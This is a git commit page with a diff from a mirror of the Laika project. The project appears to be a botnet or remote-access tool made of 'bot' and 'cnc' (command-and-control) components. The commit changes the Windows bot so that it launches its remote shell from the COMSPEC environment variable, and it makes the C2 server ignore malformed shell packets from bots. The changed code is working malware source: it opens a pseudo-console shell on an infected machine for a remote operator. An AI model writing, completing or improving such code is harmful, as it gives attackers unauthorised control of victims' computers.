CPunch
/
Laika
mirror of https://github.com/CPunch/Laika.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Windows: use COMSPEC environment variable to grab the shell 

- shells on windows are now opened from the COMSPEC env variable
- cnc will now ignore malformed shell packets from bots instead of killing them
This commit is contained in:
CPunch 2022-04-20 10:10:44 -05:00
parent cfe633f1d5
commit c3c42e298f
2 changed files with 12 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
bot/win/winshell.c
View File

@ -80,7 +80,7 @@ HRESULT InitializeStartupInfoAttachedToPseudoConsole(STARTUPINFOEX *pStartupInfo
struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows) {;
HRESULT hr;
LPCTSTR cmd = TEXT("cmd.exe");
TCHAR szComspec[MAX_PATH];
struct sLaika_shell* shell = (struct sLaika_shell*)laikaM_malloc(sizeof(struct sLaika_shell));
ZeroMemory(shell, sizeof(struct sLaika_shell));
@ -92,6 +92,12 @@ struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows)
return NULL;
}
/* get user's shell path */
if (GetEnvironmentVariable("COMSPEC", szComspec, MAX_PATH) == 0) {
laikaM_free(shell);
return NULL;
}
/* create process */
hr = InitializeStartupInfoAttachedToPseudoConsole(&shell->startupInfo, shell->pseudoCon);
if (hr != S_OK) {
@ -104,7 +110,7 @@ struct sLaika_shell *laikaB_newShell(struct sLaika_bot *bot, int cols, int rows)
/* launch cmd shell */
hr = CreateProcess(
NULL, /* No module name - use Command Line */
cmd, /* Command Line */
szComspec, /* Command Line */
NULL, /* Process handle not inheritable */
NULL, /* Thread handle not inheritable */
FALSE, /* Inherit handles */

6
cnc/src/cnc.c
View File

@ -116,8 +116,9 @@ void laikaC_handleShellClose(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u
struct sLaika_cnc *cnc = bInfo->info.cnc;
uint8_t _res = laikaS_readByte(&peer->sock);
/* ignore packet if shell isn't open */
if (bInfo->shellAuth == NULL)
LAIKA_ERROR("LAIKAPKT_SHELL_CLOSE malformed packet!");
return;
/* forward to SHELL_CLOSE to auth */
laikaS_emptyOutPacket(bInfo->shellAuth, LAIKAPKT_SHELL_CLOSE);
@ -132,8 +133,9 @@ void laikaC_handleShellData(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uD
struct sLaika_botInfo *bInfo = (struct sLaika_botInfo*)uData;
uint8_t id;
/* ignore packet if malformed */
if (bInfo->shellAuth == NULL || sz < 1 || sz > LAIKA_SHELL_DATA_MAX_LENGTH)
LAIKA_ERROR("LAIKAPKT_SHELL_DATA malformed packet!");
return;
laikaS_read(&peer->sock, (void*)buf, sz);